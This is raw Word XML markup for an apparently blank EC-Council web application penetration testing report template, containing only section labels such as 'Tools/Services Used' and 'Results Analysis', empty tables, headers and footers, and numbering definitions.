          <w:p w14:paraId="35A13981" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="221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0527E4C1" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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67F8040" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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446803AC" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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561B0F4" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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6FCE67D0" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F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  <w:tr w:rsidR="007578F0" w:rsidRPr="00C779B5" w14:paraId="4B3D213F" w14:textId="77777777" w:rsidTr="00BE4302">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D6106FD" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="00BE4302">
            <w:p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b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C779B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E55DC18" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="222"/>
              </w:numP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1EE969CD" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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7B8C9238" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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AD269C0" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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552FCAE2" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="001C6964">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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left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  <w:p w14:paraId="25871BAA" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="005232C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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BD3E59D" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRDefault="008E75EB" w:rsidP="008E75EB">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C8236" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRPr="00B07F1E" w:rsidRDefault="008E75EB" w:rsidP="008E75EB">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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5EB" w:rsidRPr="005D2C80" w14:paraId="14E65AC3" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FBC4B14" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRPr="005D2C80" w:rsidRDefault="008E75EB" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="459902AD" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRPr="005D2C80" w:rsidRDefault="008E75EB" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A087A78" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRDefault="008E75EB" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="524F1C58" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRDefault="008E75EB" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FFF3223" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRDefault="008E75EB" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C1C4E85" w14:textId="77777777" w:rsidR="00FD4A31" w:rsidRDefault="00FD4A31" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65ACF015" w14:textId="77777777" w:rsidR="00FD4A31" w:rsidRDefault="00FD4A31" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65785575" w14:textId="77777777" w:rsidR="00FD4A31" w:rsidRDefault="00FD4A31" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67669C0F" w14:textId="77777777" w:rsidR="00FD4A31" w:rsidRDefault="00FD4A31" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03738922" w14:textId="77777777" w:rsidR="00FD4A31" w:rsidRDefault="00FD4A31" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F9DAFCC" w14:textId="77777777" w:rsidR="00FD4A31" w:rsidRDefault="00FD4A31" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C333E35" w14:textId="77777777" w:rsidR="008E75EB" w:rsidRPr="005D2C80" w:rsidRDefault="008E75EB" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F7CE4D2" w14:textId="77777777" w:rsidR="007C78F8" w:rsidRPr="004418A8" w:rsidRDefault="007C78F8" w:rsidP="00197517">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1640"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007C78F8" w:rsidRPr="004418A8" w:rsidSect="00EC739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46FAB" w14:textId="77777777" w:rsidR="00D61A42" w:rsidRDefault="00D61A42" w:rsidP="00593D38">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2242C5DE" w14:textId="77777777" w:rsidR="00D61A42" w:rsidRDefault="00D61A42" w:rsidP="00593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04DAD" w14:textId="77777777" w:rsidR="00357C54" w:rsidRDefault="00357C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D861B" w14:textId="77777777" w:rsidR="003C1F1C" w:rsidRPr="003C1F1C" w:rsidRDefault="003C1F1C" w:rsidP="003C1F1C">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t xml:space="preserve">Page | </w:t>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">                                                                    </w:t>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t xml:space="preserve">Certified Penetration Testing Professional </w:t>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t xml:space="preserve">Copyright © by </w:t>
    </w:r>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:ascii="Impact" w:eastAsia="Yu Mincho" w:hAnsi="Impact" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t>EC-Council</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="05BEA7F5" w14:textId="77777777" w:rsidR="003C1F1C" w:rsidRPr="003C1F1C" w:rsidRDefault="003C1F1C" w:rsidP="003C1F1C">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Yu Mincho" w:hAnsi="Times New Roman" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="003C1F1C">
      <w:rPr>
        <w:rFonts w:eastAsia="Yu Mincho" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t xml:space="preserve">                                                                                                                  All Rights Reserved. Reproduction Is Strictly Prohibited.</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="437B9E4A" w14:textId="77777777" w:rsidR="003C1F1C" w:rsidRDefault="003C1F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8862B" w14:textId="77777777" w:rsidR="00357C54" w:rsidRDefault="00357C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EBCA7" w14:textId="77777777" w:rsidR="00D61A42" w:rsidRDefault="00D61A42" w:rsidP="00593D38">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54681703" w14:textId="77777777" w:rsidR="00D61A42" w:rsidRDefault="00D61A42" w:rsidP="00593D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0C612" w14:textId="26B387A0" w:rsidR="00357C54" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="1AB4D7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393797" o:spid="_x0000_s1026" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:463.5pt;height:129pt;rotation:315;z-index:-251655168;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#f2f2f2 [3052]" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;Impact&quot;;font-size:105pt" string="EC-Counci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FF82B" w14:textId="04FFBBDD" w:rsidR="00593D38" w:rsidRPr="00593D38" w:rsidRDefault="00000000" w:rsidP="00593D38">
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="61B8AE3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393798" o:spid="_x0000_s1027" type="#_x0000_t136" style="position:absolute;margin-left:0;margin-top:0;width:463.5pt;height:129pt;rotation:315;z-index:-251653120;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#f2f2f2 [3052]" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;Impact&quot;;font-size:105pt" string="EC-Council"/>
          <w10:wrap anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00593D38" w:rsidRPr="00593D38">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t xml:space="preserve">Certified Penetration Testing Professional                                                                                                                     </w:t>
    </w:r>
    <w:r w:rsidR="00593D38" w:rsidRPr="00593D38">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00593D38" w:rsidRPr="00593D38">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">                Exam 412-80</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="50E06196" w14:textId="6FC5E7B5" w:rsidR="00593D38" w:rsidRPr="00593D38" w:rsidRDefault="00593D38" w:rsidP="00593D38">
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t>Web Application</w:t>
    </w:r>
    <w:r w:rsidR="00137679">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t xml:space="preserve"> Penetration Testing</w:t>
    </w:r>
    <w:r w:rsidRPr="00593D38">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:kern w:val="0"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w14:ligatures w14:val="none"/>
      </w:rPr>
      <w:t xml:space="preserve"> Report Template</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5AFB002C" w14:textId="77777777" w:rsidR="00593D38" w:rsidRDefault="00593D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A9AA6" w14:textId="3BD7B465" w:rsidR="00357C54" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="5F7237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393796" o:spid="_x0000_s1025" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:463.5pt;height:129pt;rotation:315;z-index:-251657216;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#f2f2f2 [3052]" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;Impact&quot;;font-size:105pt" string="EC-Counci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74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689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43AE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3605E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8189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9B0D5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043AA3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B23E8B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CE142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4EC08E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500B7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDC0A5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5540C68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C54D9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E2551C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134774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72B3C10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301E49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98272B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B992D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99C5191"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51CC76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9EE235C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9FE7D86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66068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A2B33A3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A4B199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A6739DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4E21E3C"/>
    <w:lvl w:ilvl="0" w:tplc="5F22F28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AC95FD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B556D8B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B9A520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BD5218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BDF2740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CA0163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CA11BDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A24A7714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CC21F6C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DC3308E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EB022E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FAF5014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06765D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17616D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BA6D272"/>
    <w:lvl w:ilvl="0" w:tplc="DEF84A0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195305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1AE00D1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1E6680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2225D4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2625AF9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28D6A9D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2C11A8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6560ED8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33825710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6D807B3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78C1129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84D7C4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877479D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9604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8C02B21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8F64B0F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905032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9DB2C8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A222DA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B50D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A450D9B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BCE68B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C15029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C535F8D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CB2061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D0C1C8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D156139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1D7F406D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1DA50000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A52B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1E085BF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E722627"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DC4D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1EB112F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F496F3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1F622D5D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0423C6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20633C4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0C550F1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22106DBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B992D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22566A5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22C35305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241C764E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244C1DCC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246A334E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4976872"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5378AAAA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4C3189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289B711C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90D1F30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4E21E3C"/>
    <w:lvl w:ilvl="0" w:tplc="5F22F28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291D059C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945696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2A942ED2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6FEF952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B03492B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CB5658D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DC4D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2D79269D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C54D9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2E681181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3022390B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D780DF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303E787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305F58E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315D6C64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318D1A0D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336B44A6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33E173AA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33EA643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4111B20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35110A5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4E21E3C"/>
    <w:lvl w:ilvl="0" w:tplc="5F22F28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352516F3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3575073B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35D8619E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35E83FDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCB828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37270977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37322770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37336E62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DC4D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37CB1EB0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37ED4F39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37FC7AD0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39A07A2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3A6D179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3AD12CFE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F46C8F0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3B5D216C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3C304BD3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3C4E3F73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3C7D5A38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3CD91AE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3D007C4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3D116EA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3D7A207B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3D912B7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3E3B2631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3E4A4F09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3F4615D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3F486C8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40A713F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421C71F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83C8EEE2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425C160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42B676A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432074B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4972229E"/>
    <w:lvl w:ilvl="0" w:tplc="BB0AFF7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="144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4368207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448B4AD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C54D9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44B34C0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EB86D08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452A2EFD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45E63F0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46770D00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4686537F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D780DF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47FA7EEB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48436E6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48594B7B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49446A6C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495D3F4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49B32EEE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49C13992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4A642A3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4B1A6163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4B1C2B43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4BCA4740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4C5E794F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0181E24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4C661F71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4C7C01A9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4D0A4C60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51CC76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4D6D0A1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4E414D35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4EA25E99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4EAE29C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4F385A9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B71AD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4F732B9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5086674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50994AA2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50C54C6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50E766DF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510862D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513B0BA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53CA214B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55FB409D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56C1698D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57146920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57437136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57925414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579653A6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583B12B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5891794F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592C400E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593C0CF0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596A7DB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597F21F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D56F8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5A2B6588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5A2B6D62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C0AC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5AEB23A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5B0E7894"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="094863FA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5B406E43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5C4A3F8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60091295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615F41A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61CD539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622F03A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6278506E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633411E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B992D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639A4AA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6520386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672C42D5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691D47DB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693730FE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69786BB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6AA466D9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6B4F1278"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9604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6B6C60F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6C537E03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6C874BDF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6D674943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6E64534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6E796B1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71297670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71D9681B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20A81990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71FE5EDC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72834F03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9604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72DC34E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72EB7273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73252B4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7414710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74F81B0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752845B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76DD4A74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A13E3048"/>
    <w:lvl w:ilvl="0" w:tplc="B25C1E4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1050" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Bodoni MT" w:hAnsi="Bodoni MT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210" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="77DC0D81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C54D9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7878560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7951603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7A1971FB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7A1C531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7B2B05B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7B95458E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7BAA780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7BEE2E5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7C7F71F4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7DBB4B96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8189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7E000E7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4E21E3C"/>
    <w:lvl w:ilvl="0" w:tplc="5F22F28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7F924DCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F050DBDC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818340">
    <w:abstractNumId w:val="209"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="726222917">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="611592913">
    <w:abstractNumId w:val="136"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1408307063">
    <w:abstractNumId w:val="159"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="868763041">
    <w:abstractNumId w:val="158"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1274630059">
    <w:abstractNumId w:val="165"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="642123893">
    <w:abstractNumId w:val="142"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="13582583">
    <w:abstractNumId w:val="137"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="381444205">
    <w:abstractNumId w:val="205"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1274746899">
    <w:abstractNumId w:val="148"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="946961119">
    <w:abstractNumId w:val="86"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="381752718">
    <w:abstractNumId w:val="198"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="525294088">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1469206496">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1173180381">
    <w:abstractNumId w:val="162"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1377508735">
    <w:abstractNumId w:val="176"/>
  </w:num>
